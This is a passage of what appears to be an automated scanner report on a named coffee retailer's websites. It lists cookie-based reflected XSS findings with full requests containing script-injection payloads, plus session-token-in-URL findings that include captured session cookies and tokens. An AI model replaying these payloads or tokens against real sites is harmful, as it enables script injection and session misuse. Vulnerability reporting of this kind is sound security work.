Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-delivery/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBbfd3e</script><script>alert(1)</script>0ff078f663a;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:04 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
at Home HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks at Home HomePage"
   var s_prop3="SBPTPAHP1SHTBBFD3E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0FF078F663A"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-delivery/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_camp
...[SNIP]...

3.100. http://www.starbucksstore.com/starbucks-coffee-tours/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-tours/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9d8</script><script>alert(1)</script>b1e2ceb23fc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1d9d8</script><script>alert(1)</script>b1e2ceb23fc;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:32 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
e="Starbucks Tours Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Tours Page"
   var s_prop3="SBPTPAHP1SHTB1D9D8</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B1E2CEB23FC"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-tours/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaig
...[SNIP]...

3.101. http://www.starbucksstore.com/starbucks-gift-cards [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gift-cards

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f0a0</script><script>alert(1)</script>ba0159ff903 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gift-cards HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2f0a0</script><script>alert(1)</script>ba0159ff903;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19751
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:19 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
rbucks Card HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Card HomePage"
   var s_prop3="SBPTPAHP1SHTB2F0A0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>BA0159FF903"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gift-cards/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.102. http://www.starbucksstore.com/starbucks-gifts [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9ad5</script><script>alert(1)</script>a10c039ee07 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gifts HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf9ad5</script><script>alert(1)</script>a10c039ee07;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ame="Starbucks Gift Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Gift Page"
   var s_prop3="SBPTPAHP1SHTBF9AD5</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A10C039EE07"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gifts/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.103. http://www.starbucksstore.com/starbucks-gifts/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab9e</script><script>alert(1)</script>091524f545b was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gifts/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:45 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ame="Starbucks Gift Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Gift Page"
   var s_prop3="SBPTPAHP1SHTB8AB9E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>091524F545B"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gifts/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.104. http://www.starbucksstore.com/starbucks-reserve [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-reserve

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9601</script><script>alert(1)</script>ad932c6690c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-reserve HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBc9601</script><script>alert(1)</script>ad932c6690c;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29291
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:31 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
ve Coffee Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Reserve Coffee Page"
   var s_prop3="SBPTPAHP1SHTBC9601</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>AD932C6690C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-reserve/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
...[SNIP]...

3.105. http://www.starbucksstore.com/starbucks-seasonal [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99900</script><script>alert(1)</script>837b0729912 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-seasonal HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB99900</script><script>alert(1)</script>837b0729912;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
pageName="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Search Listing: Internal: "
   var s_prop3="SBPTPAHP1SHTB99900</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>837B0729912"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.106. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal/starbucks-seasonal.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f7</script><script>alert(1)</script>6c9e3006551 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3e7f7</script><script>alert(1)</script>6c9e3006551;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79452
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:17 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
pageName="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Search Listing: Internal: "
   var s_prop3="SBPTPAHP1SHTB3E7F7</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6C9E3006551"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.107. http://www.starbucksstore.com/starbucks-via [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-via

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a2e9</script><script>alert(1)</script>f07738979de was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-via HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6a2e9</script><script>alert(1)</script>f07738979de;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32239
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:29 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
eName="Starbucks VIA Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks VIA Page"
   var s_prop3="SBPTPAHP1SHTB6A2E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F07738979DE"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-via/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.108. http://www.starbucksstore.com/tea [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /tea

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4fa1</script><script>alert(1)</script>297d9261d7d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tea HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf4fa1</script><script>alert(1)</script>297d9261d7d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26007
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:58 GMT
Connection: close


       <head>
       <title>Tea at Starbucks Store</title>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
...[SNIP]...
ageName="Tazo Tea HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Tazo Tea HomePage"
   var s_prop3="SBPTPAHP1SHTBF4FA1</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>297D9261D7D"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/tea/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=
...[SNIP]...

4. Session token in URL
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://www.starbucks.com/about-us

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:21 GMT
Connection: close
Content-Length: 38166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

4.2. http://www.starbucks.com/site-map

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /site-map HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:27 GMT
Connection: close
Content-Length: 91508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
